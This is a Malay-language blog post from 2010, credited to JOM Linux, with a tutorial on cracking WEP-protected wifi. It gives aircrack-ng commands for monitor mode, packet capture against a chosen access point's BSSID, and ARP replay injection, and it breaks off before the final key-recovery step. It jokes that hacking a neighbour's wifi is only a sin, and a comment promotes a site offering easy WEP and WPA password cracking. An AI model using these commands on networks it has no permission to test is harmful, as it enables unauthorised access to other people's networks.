Tuesday, November 9, 2010

Nah. Cara Nak Godam Wifi.Nah. Cara Nak Godam Wifi.

Kerana banyak yang asyik bertanyakan bagaimana nak godam wifi atau kata orang Jawanya, hack. Maka kami sediakan tutorial tak seberapa ni.

Join Darlie’s White Mission Contest to win a trip to Japan!

Asalnya, ingat nak ambil screenshot awal sampai habis — tapi laptop yang digunakan penah jatuh dan satu kaki lcd dan juga wayar wifi yang sambung ke antena dah putusjadi tak boleh nak teruskan hacking ke sampai akhir pasal siaran tak cukup bagus diterima.

Apa-apapun, tutorial ini kami ringkaskan supaya orang yang biasa pun boleh gunakan. Perlu diingatkan!

  1. Kami buat tutorial ini hanya sekadar untuk anda mencuba dan atas permintaan — janganlah anda berharap kami akan menjawab atau memberi sokongan terhadap apa-apa permasalahan wifi anda.
  2. Gunakan secara beretika — gunakan untuk menguji sama ada kata laluan wifi anda selamat atau tidak. Kalau nak hack wifi jiran sebelah pun boleh tapi dosa ajelah.
  3. Tak semua kad wifi menyokong proses hack ini — kami menggunakan kad wifi Atheros AR5BMB5. Kad lain yang tak mesra Linux kemungkinan besar tak boleh buat seperti Broadcom.
  4. Tolong jangan salin tampal arahan di sini. Sebab ada perbezaan dari segi tanda di web ini dengan command. Sila taipkan semula ok.
  5. Ini hanya untuk menggodam sekuriti jenis WEP sahaja.

Tutorial.

Anda perlukan pakej sesuai iaitu Aircrack-ng dipasang. Kami gunakan tutorial ini pada Ubuntu 10.04.

sudo apt-get install aircrack-ng

Proses seterusnya adalah untuk menghidupkan monitor atau penganalisi wifi. Untuk itu, kad wifi hendaklah dihidupkan dengan mode monitor.

sudo airmon-ng start wlan0

Seterusnya, kita monitor access point apa yang wujud dan maklumat yang berkaitan seperti BSSID.

sudo airodump-ng mon0

Pilih mana satu wifi yg hendak digodam dan taipkan arahan di bawah. Gantikan maklumat yang berkaitan dengan senarai wifi yang muncul.

sudo airodump-ng -c [nombor_channel] — bssid [nombor_bssid] mon0 -w jomlinux

Contohnya,

sudo airodump-ng -c 6 — bssid 00:22:75:6E:AB:D6 mon0 -w jomlinux

Dengan langkah ini, komputer akan menangkap data yang diterima dari access point yang berkenaan. Seterusnya buka tab baru, jangan padam terminal yang tengah dibuka. OK!

Langkah di bawah ini pula akan mempercepatkan access point memberi respon dan data supaya tak perlu tunggu lama macam bercinta.

sudo aireplay-ng -3 -b [nombor_bssid] mon0



Sumber rujukan daripada JOM Linux

1 comment:

  1. pening kan???....tp kalau guna application yg saya tunjukkan ni lagi snang..3 click 10 min terus dapat password wifi..samaada WEP atau pun WPA (terutamanya pengguna tmnet UNIFI)..xckop dgn tu..sy ajar lg mcm mne yg wat kalau wifi kite kne hack...xperlu tuka password...block je utk slama2nya.. lawat :
    http://godamwifi.blogspot.com

    ReplyDelete